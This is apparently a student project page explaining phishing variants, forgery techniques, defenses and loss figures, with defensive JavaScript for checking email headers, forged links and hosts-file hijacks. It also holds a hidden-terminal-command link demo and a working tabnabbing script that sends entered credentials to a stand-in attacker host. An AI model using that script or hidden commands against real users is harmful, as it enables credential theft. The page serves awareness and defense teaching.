Phishing

Obtaining information by masquerading as a trustworthy entity.

With so many new phishing techniques appearing every year, one cannot be too careful.




Introduction


Phishing is a form of manipulation that imitates a trusted website or sender in order to lower the victim's guard. Phishing pages are generally built to harvest usernames and passwords for the site they copy. Over the last year, more than 100,000 people have had their information compromised through phishing. It is a very popular method of stealing credentials because it demands so little effort from the attacker: producing a site that looks exactly like another one takes very little time, especially since every browser can save a complete copy of a web page. It is a method that most people today are still not fully aware of.


What:

Phishing: in the simplest terms, the act of attempting to obtain information by pretending to be a trustworthy entity. The attack has several variants, but they all share that definition.


How:

It can be carried out in many different ways, most commonly through email spoofing, instant-message spoofing and media baiting (a link that promises a video, a song or a download behind a login). One variant is Spear Phishing, where the lure is personalized for the target. Another is Whaling, which is spear phishing aimed at senior or top management, whose accounts expose more sensitive information.


Who:

Everyone is a potential target. The attack works best against members of the public who are unaware of basic password hygiene and of the terms and conditions they agreed to (a legitimate provider will never ask for a password by email).


Where:

Phishing can be carried out anywhere, but because it is almost always tied to IT it is mostly conducted over the Internet. The user is sent an email with a link to a fake login page; once credentials are entered, the attacker has access to the account and everything in it. Another common lure is a site that requires a login before it will show some piece of media. Because so many people reuse the same credentials across all their accounts, capturing one login often means capturing most of them.





Attack Types


There are many types of phishing attack, usually distinguished by how personalized the lure is and who the intended victim is. An attack aimed at an unknown audience is plain phishing. When it is crafted for a specific set of people it is Spear Phishing, and when it is aimed at a victim known to hold very sensitive information it is Whaling. An attack delivered by phone call is Vishing (voice phishing); its SMS counterpart is Smishing. Many new variations have been reported in the last few years, and as more and more mailing lists become public it has become much easier to target unwary users. MSU itself has seen phishing campaigns against entire departments: because MSU mailing lists are publicly available, it is very easy to email students and faculty with disguised messages.


Regular attack:

An attacker obtains a mailing list from somewhere, builds a copy of a bank's website that looks exactly like the real one, and sends an email saying the account will be suspended unless the recipient clicks a link. Suppose only 10% of recipients actually have an account with that bank and so click the link, and only 10% of those fall for it and log in; their credentials are now stored in the attacker's database. With a hypothetical list of 1000 people, that is 10 victims, and if each of them has at least $500 in the account the attacker has just made $5000 from a single email. Phishing is about the easiest attack there is; it is known for low input and high output.


Spear Phishing:

An attacker obtains the mailing list of everyone at a large corporation and disguises an email as coming from the company's IT department, with a link under the message: “We’ve been hacked! Download this as soon as possible to secure your individual systems. – IT Department”. Most employees recognize it because of their regular training; however, a new intern clicks the link and downloads the file. To his surprise, the file is a worm, which replicates itself across the network, and soon the entire company is infected. A phishing attack does not need many people to click, because a single infected machine is enough to get a foothold. Phishing is often the entry point for other attacks.


Whaling:

An attacker sends the CEO an email disguised as an FBI subpoena. When the CEO tries to open the attachment, a prompt says a newer version of Flash is needed to view it, with a link at the bottom; the link, obviously, is the phishing attempt. Downloading the fake Flash update runs a worm on the machine. Because it is the CEO's machine, the chance of losing very confidential information is high. This is a big problem in cities with many startup companies, since most of them are not well versed in the law, its practices or its documents.

"Only amateurs attack machines; professionals target people." -Bruce Schneier


Vishing:

An attacker sets up an application that simply calls every number on a list. The call claims to be from Bank of America and says that unusual activity has been detected on the victim's account, then asks the victim to enter their account number to stop it. Once the victim keys in the number, the attacker records it and uses it for profit of some sort.

Vishing Demo


Smishing:

An attacker texts every victim on a list saying they have won a $1000 Best Buy gift card, with a link under the message. Victims who tap it land on a phished page that offers to let them pick the card up in New York (or somewhere equally far away) or have it mailed for a small $2 shipping and handling charge. Most victims do not weigh $2 against $1000, so they enter their credit card details, and the attacker now has everything needed for identity theft.

Smishing Demo





Attack Techniques


Attackers use many tricks these days to carry out a phishing attack. As noted above, phishing is an attack whose output far exceeds its input, and the more effort the attacker puts into the attack, the higher the quality of the result.


Email Creation

Creating emails is not hard, which is why email is the best-known form of phishing. Conveniently for the attacker, emails from many major companies carry little styling: they simply state their purpose and sign off with a company name and address, so a forgery needs little more than a plausible sender address and a link. That is essentially why attackers prefer email over the other delivery methods.
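A forged email looks right in the mail client, but its headers usually give it away. The following is an added example, not code from the original project: it parses a raw message's headers and reports the indicators that the visible sender was forged (Reply-To or Return-Path pointing at another domain, and SPF/DKIM/DMARC results that did not pass). The two sample messages and the attacker domain are constructed for this example.

```javascript
// Added example, not from the original project: check a raw email's headers
// for the signs that its "trusted" sender was forged. The two messages below
// are constructed for this example; the attacker domain is invented.

function parseHeaders(raw) {
  // RFC 5322: headers end at the first blank line; lines starting with
  // whitespace continue the previous header (folding) and are joined back.
  const headers = {};
  let current = null;
  for (const line of raw.split(/\r?\n/)) {
    if (line === '') break;
    if (/^[ \t]/.test(line) && current) {
      headers[current] += ' ' + line.trim();
      continue;
    }
    const idx = line.indexOf(':');
    if (idx < 0) continue;
    current = line.slice(0, idx).trim().toLowerCase();
    headers[current] = line.slice(idx + 1).trim();
  }
  return headers;
}

// "Display Name <user@host>" or a bare address -> user@host (lower-cased)
function addressOf(value) {
  const m = value.match(/<([^>]+)>/);
  return (m ? m[1] : value).trim().toLowerCase();
}

function domainOf(address) {
  return address.split('@').pop();
}

function spoofingIndicators(raw) {
  const h = parseHeaders(raw);
  const findings = [];
  const fromDomain = domainOf(addressOf(h['from'] || ''));

  // Replies and bounces going to a domain other than the visible sender's
  if (h['reply-to'] && domainOf(addressOf(h['reply-to'])) !== fromDomain) {
    findings.push(`reply-to domain ${domainOf(addressOf(h['reply-to']))} differs from From domain ${fromDomain}`);
  }
  if (h['return-path'] && domainOf(addressOf(h['return-path'])) !== fromDomain) {
    findings.push(`return-path domain ${domainOf(addressOf(h['return-path']))} differs from From domain ${fromDomain}`);
  }

  // Authentication-Results as stamped by the receiving mail server. Only the
  // header your own MTA added is trustworthy; inbound copies must be stripped.
  const auth = (h['authentication-results'] || '').toLowerCase();
  const checks = [['spf', /spf=(fail|softfail|none)/], ['dkim', /dkim=(fail|none)/], ['dmarc', /dmarc=fail/]];
  for (const [mech, bad] of checks) {
    const m = auth.match(bad);
    if (m) findings.push(`${mech} result is ${m[1] || 'fail'}`);
  }
  return findings;
}

// Constructed phishing message: From claims the bank, everything else points
// at the attacker's infrastructure and authentication failed.
const SPOOFED = [
  'Return-Path: <bounce@secure-alerts-mail.example>',
  'Authentication-Results: mx.receiver.example;',
  '\tspf=fail smtp.mailfrom=secure-alerts-mail.example;',
  '\tdkim=none; dmarc=fail header.from=bankofamerica.com',
  'From: "Bank of America" <alerts@bankofamerica.com>',
  'Reply-To: verify@secure-alerts-mail.example',
  'Subject: Your account will be suspended',
  '',
  'Click the link below to keep your account active.',
].join('\r\n');

// Constructed legitimate message for comparison.
const LEGIT = [
  'Return-Path: <alerts@bankofamerica.com>',
  'Authentication-Results: mx.receiver.example; spf=pass smtp.mailfrom=bankofamerica.com;',
  '\tdkim=pass header.d=bankofamerica.com; dmarc=pass header.from=bankofamerica.com',
  'From: "Bank of America" <alerts@bankofamerica.com>',
  'Subject: Your statement is available',
  '',
  'Sign in at the address you normally use.',
].join('\r\n');

console.log('spoofed:', spoofingIndicators(SPOOFED));
console.log('legit:  ', spoofingIndicators(LEGIT));
```

Run it with node and the spoofed message produces five findings while the legitimate one produces none. Note the caveat in the code: an attacker can add their own Authentication-Results header before the message reaches you, so the check is only meaningful on the header your own receiving server stamped.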

Email Fraud


Website Forgery

Forging a website has become much easier over the years. Attackers once had to copy all the files and hand-write styles to make the copy look the same; now a near-perfect replica takes under five minutes. All it takes is opening the page and saving it to the local PC: browsers such as Google Chrome and Firefox also save the stylesheets and JavaScript files, even when those live on a different server from the forged site. Attackers also have a tool, written in Java, that asks only for a URL and then downloads the entire site and even hosts it online automatically. The following link lets you play with the tool, but it is also a deliberate demonstration of link forgery: the text you see is a git URL, while what the page actually carries (and what you would paste into a terminal) is the command shown first. Never paste copied text into a terminal without reading it.

git clone -l -s -0p -r /dev/null; clear; echo -n 'Damn it ';whoami|tr -d '\n';echo -e '\nThis is a project on Phishing, why the hell would you copy stuff from the internet ONTO YOUR LOCAL TERMINAL? \nI could run any command I want on your machine. Anyways, this is a very personalized example of link forgery. Stay wary my friends.'; echo -e '\n';
Visible (dummy) text:
git://github.com/zillwc/JavaPhishingProject.git


Link Forgery

Many people underestimate the severity of this technique. An attacker simply writes a hyperlink whose visible text says one thing while the underlying URL points somewhere else, so the victim lands on a site they did not expect. This happens a lot on forums, since nearly every forum now supports WYSIWYG editing, which lets the attacker attach a link to their phished page where the victim expects a link to something else. For example, a link that reads as Facebook can actually go to Myspace; nobody wants that. Older browsers also let page scripts spoof or cover the address bar so the user could not tell the difference. Modern browsers no longer let a page change the origin shown there, but a script can still change the path within its own origin (history.pushState), and a pop-up opened with the browser chrome hidden can draw a fake address bar, so the address bar alone is not proof.
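The two tells described in the Website Forgery and Link Forgery sections can both be checked mechanically on the HTML of a suspicious page. The block below is an added example, not code from the original project: it finds anchors whose visible text names a different host than the href, and credential forms that post somewhere other than the brand the page claims to be (a saved copy of a login page has its form action rewritten to the attacker's server). The sample page, the attacker hostnames and the "same site" shortcut are assumptions made for the example.

```javascript
// Added example, not from the original project: inspect a page's HTML for
// anchors whose visible text names a different host than the href, and for
// credential forms that post somewhere other than the brand the page claims
// to be. The HTML and hostnames below are constructed.

// Matches <a ...>...</a> and <form ...>...</form> with attributes and body
const TAG_RE = /<(a|form)\b([^>]*)>([\s\S]*?)<\/\1\s*>/gi;

// Pull one attribute value out of a tag's attribute string (quoted or bare)
function attr(attrs, name) {
  const re = new RegExp(`(?:^|\\s)${name}\\s*=\\s*(?:"([^"]*)"|'([^']*)'|([^\\s>]+))`, 'i');
  const m = attrs.match(re);
  if (!m) return null;
  return m[1] !== undefined ? m[1] : m[2] !== undefined ? m[2] : m[3];
}

// Resolve a (possibly relative) URL against the page and return its hostname
function hostOf(value, base) {
  try { return new URL(value, base).hostname.toLowerCase(); } catch (e) { return null; }
}

// First thing that looks like a hostname in the visible text of an element
function hostNamedInText(inner) {
  const text = inner.replace(/<[^>]*>/g, '');
  const m = text.match(/\b((?:[a-z0-9-]+\.)+[a-z]{2,})\b/i);
  return m ? m[1].toLowerCase() : null;
}

// Crude "same site" test on the last two labels. Assumption: no public suffix
// list, so co.uk-style domains would need a real PSL lookup in production.
function sameSite(a, b) {
  const tail = (h) => h.split('.').slice(-2).join('.');
  return tail(a) === tail(b);
}

function auditPage(html, pageUrl, claimedBrandHost) {
  const findings = [];
  for (const m of html.matchAll(TAG_RE)) {
    const tag = m[1].toLowerCase(), attrs = m[2], inner = m[3];
    if (tag === 'a') {
      const href = attr(attrs, 'href');
      const target = href ? hostOf(href, pageUrl) : null;
      const shown = hostNamedInText(inner);
      if (shown && target && !sameSite(shown, target)) {
        findings.push({ kind: 'link-forgery', shown, target });
      }
    } else {
      const action = attr(attrs, 'action');
      const target = hostOf(action || '', pageUrl); // no action = same page
      const asksForPassword = /type\s*=\s*["']?password/i.test(inner);
      if (asksForPassword && target && !sameSite(target, claimedBrandHost)) {
        findings.push({ kind: 'offsite-credential-form', target });
      }
    }
  }
  return findings;
}

// Constructed clone of a social-network login page, hosted on the attacker's
// domain, containing the forged "Facebook" link from the text above.
const CLONED_PAGE = `
<h1>Welcome back</h1>
<p>Having trouble? Visit <a href="https://www.myspace.com/help">www.facebook.com/help</a></p>
<form method="post" action="https://login-collector.attacker.example/drop">
  <input name="email">
  <input name="pass" type="password">
  <button>Log In</button>
</form>
<a href="/privacy">Privacy policy</a>
<form action="/search"><input name="q"></form>
`;

console.log(auditPage(CLONED_PAGE, 'https://facebook-login.attacker.example/', 'www.facebook.com'));
```

Against the constructed page this reports one link-forgery finding (text says www.facebook.com, href goes to www.myspace.com) and one off-site credential form; the help link and the search form are left alone. The regex parsing is enough for a quick triage script but not a substitute for a real HTML parser.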


Redirection

This is by far the most effective way to get a victim to fall for a phishing page. It can be carried out in several ways and is usually aimed at a small audience. In the first, the attacker joins the network and performs a man-in-the-middle attack: when a request for a particular URL is seen, instead of returning the real site the attacker's machine (acting as the access point or as the DNS resolver) answers with the phished page. This almost always catches the user off guard, because nothing in their activity looks disturbed. The catch for the attacker is HTTPS: a substituted page cannot present the real site's certificate, so the browser warns, which is why such attacks serve the fake over plain HTTP or rely on the user clicking through the warning. The second form needs physical access to the victim's computer: the attacker edits the hosts file (/etc/hosts on Unix-like systems, C:\Windows\System32\drivers\etc\hosts on Windows) to map the real site's hostname to the phishing server. The third is to infect the computer with malware that does the redirection; it stays dormant until a request for the target site comes in, then sends the unaware user to the fake site.
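The hosts-file variant leaves an artifact on disk, and checking for it is a standard incident-response step. The following is an added example, not code from the original project: it parses hosts-file syntax and flags any watched domain that has been pinned to an address outside loopback. The file content and the addresses (from the TEST-NET-3 documentation range) are constructed.

```javascript
// Added example, not from the original project: parse a hosts file and flag
// entries that pin a watched site to an address outside loopback, which is
// what the local-redirection technique above leaves behind. The file content
// and addresses (TEST-NET-3 range) are constructed.

const CONSTRUCTED_HOSTS = `
127.0.0.1    localhost
::1          localhost ip6-localhost
# line an attacker with local access would add: the bank now resolves to
# a machine they control, with no DNS involved
203.0.113.5  www.bankofamerica.com bankofamerica.com
192.168.1.20 intranet.corp.example   # legitimate internal override
`;

// hosts format: "<address> <name> [<name>...]"; "#" starts a comment
function parseHosts(text) {
  const entries = [];
  for (const raw of text.split(/\r?\n/)) {
    const line = raw.replace(/#.*$/, '').trim();
    if (!line) continue;
    const [address, ...names] = line.split(/\s+/);
    for (const name of names) entries.push({ address, name: name.toLowerCase() });
  }
  return entries;
}

function isLoopback(address) {
  return address.startsWith('127.') || address === '::1';
}

// A name is watched if it is one of the watched domains or a subdomain of one
function isWatched(name, watched) {
  return watched.some((w) => name === w || name.endsWith('.' + w));
}

function findHijacks(text, watched) {
  const wanted = watched.map((w) => w.toLowerCase());
  return parseHosts(text).filter((e) => isWatched(e.name, wanted) && !isLoopback(e.address));
}

console.log(findHijacks(CONSTRUCTED_HOSTS, ['bankofamerica.com']));
```

On the constructed file this reports the two bank entries pointing at 203.0.113.5 and nothing for localhost. To audit a real machine, replace CONSTRUCTED_HOSTS with the contents of /etc/hosts (or the Windows path given above) read via fs.readFileSync, and pass the list of domains you care about; legitimate internal overrides like the intranet line will also show up if you add them to the watch list, so review hits rather than acting on them blindly.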


Tabnabbing

This is a newer method of phishing that has become very popular because of the way people use computers and phones today. In a recent survey, 9 out of 10 people keep multiple tabs open, and 6 of those 9 do so to preserve a page for later. Tabnabbing exploits that habit. The page acts like an ordinary site or service, but it is really listening: it waits for the victim to switch to another tab and then rewrites itself (title, favicon and content) to look like a different site's login page. When the victim comes back to the tab, nothing seems wrong, they log in, and the login information is sent to the attacker.

Here is my proof of concept: Blend

Smartphone Tabnabbing: Demo
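The mechanism behind the demos above, as an added example that is not the project's own proof of concept: the page registers for the Page Visibility API's visibilitychange event and, the first time the tab is hidden, replaces its title, favicon and body with a login form that posts to the attacker. The service name, titles and collector URL are assumptions; the document object is passed in as a parameter so the logic can be exercised outside a browser.

```javascript
// Added example, not the project's own proof of concept: a page that behaves
// normally while visible and rewrites itself into a login form for a different
// service as soon as its tab is hidden. The service name, titles and collector
// URL are assumptions; the document is passed in so it can run outside a browser.

function buildFakeLogin(serviceName, collectorUrl) {
  // A real attack pastes in the target's own markup and stylesheet; this is a
  // minimal stand-in that still posts whatever is typed to the attacker.
  return [
    '<div style="font-family:sans-serif;max-width:320px;margin:80px auto">',
    `<h2>Sign in to ${serviceName}</h2>`,
    '<p>Your session has expired. Please sign in again.</p>',
    `<form method="post" action="${collectorUrl}">`,
    '<input name="user" placeholder="Email"><br>',
    '<input name="pass" type="password" placeholder="Password"><br>',
    '<button type="submit">Sign in</button>',
    '</form></div>',
  ].join('\n');
}

function installTabnab(doc, opts) {
  const original = { title: doc.title, body: doc.body.innerHTML };
  let swapped = false;

  function swapToFake() {
    if (swapped) return;
    swapped = true;
    doc.title = opts.fakeTitle;                     // what the tab strip shows
    const icon = doc.querySelector('link[rel~="icon"]');
    if (icon) icon.href = opts.fakeFavicon;         // and the tab's icon
    doc.body.innerHTML = buildFakeLogin(opts.serviceName, opts.collectorUrl);
  }

  function restore() {                              // handy for testing only
    doc.title = original.title;
    doc.body.innerHTML = original.body;
    swapped = false;
  }

  // Page Visibility API: fires when the user switches tabs or minimizes
  doc.addEventListener('visibilitychange', () => {
    if (doc.visibilityState === 'hidden') swapToFake();
  });

  return { swapToFake, restore, isSwapped: () => swapped };
}

// In a browser, wire it to the real document. The URL in the address bar does
// not change, which is the one tell the victim can still check.
if (typeof document !== 'undefined') {
  installTabnab(document, {
    fakeTitle: 'Log in to Webmail',
    fakeFavicon: 'https://phish.attacker.example/webmail.ico',
    serviceName: 'Webmail',
    collectorUrl: 'https://phish.attacker.example/collect',
  });
}
```

Drop the block into any page you control and switch tabs to see the swap. The defensive lesson is the comment at the end: the browser never changes the address bar for a tabnabbed page, so checking the URL before typing a password is what defeats it.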





Defense


The truth I hope to convey in this presentation is that there is no sure way to protect yourself from this attack. Attackers have always found ways around browser and anti-virus protections, using JavaScript tricks and social engineering to convince the victim that they are who they claim to be. Protecting yourself completely would mean adopting so many security measures that using the Internet would become a burden. New tools keep appearing to help users recognize the attack, but, for now, awareness is all you have. The best defense against these attacks is to understand how they are carried out.


Social Response

One way to combat phishing is to train people. Corporations already include a technology-use and awareness section in every new employee's training, covering which scams exist and how to block them in email clients and elsewhere. People have to change their browsing habits and be more suspicious of everything they do online. When contacted about an account needing validation, they should take the less obvious route and contact the company directly instead of following the link to an online verification page. Companies and banks have to do their part and educate customers on their terms and conditions, stating very clearly that they will never contact them to ask for a password in order to verify their information.


Technical Response

Browsers have already started implementing responses to phishing. Both Firefox and Google Chrome check URLs against blocklists of reported phishing sites (Google Safe Browsing; community databases such as PhishTank feed such lists) and show a warning when the user lands on one:

This link looks like it goes to the US Diablo site but instead goes to a phished page. It had been reported to PhishTank, so browsers such as Google Chrome and Firefox should block it by default: us.diablo.com - try it out.





Life Examples


It is estimated that between May 2004 and May 2005, approximately 1.2 million computer users in the United States suffered losses caused by phishing, totaling about $929 million.

In the U.K., 1 in 20 computer users claimed to have lost out to phishing in 2005.

United States businesses lose an estimated US$2 billion per year as their clients become victims.

In 2007, phishing attacks escalated: 3.6 million adults lost US$3.2 billion in the 12 months ending in August 2007.

Banks in Ireland refuse to cover losses suffered by their customers, saying it is not their policy to do so.

In a June 2004 experiment in spear phishing, 80% of 500 West Point cadets who were sent a fake email from a non-existent Col. Robert Melville at West Point were tricked into clicking a link that supposedly led to a page where they would enter personal information.





Demos



Final Project Presentation plan: DDOS Amplification Attack


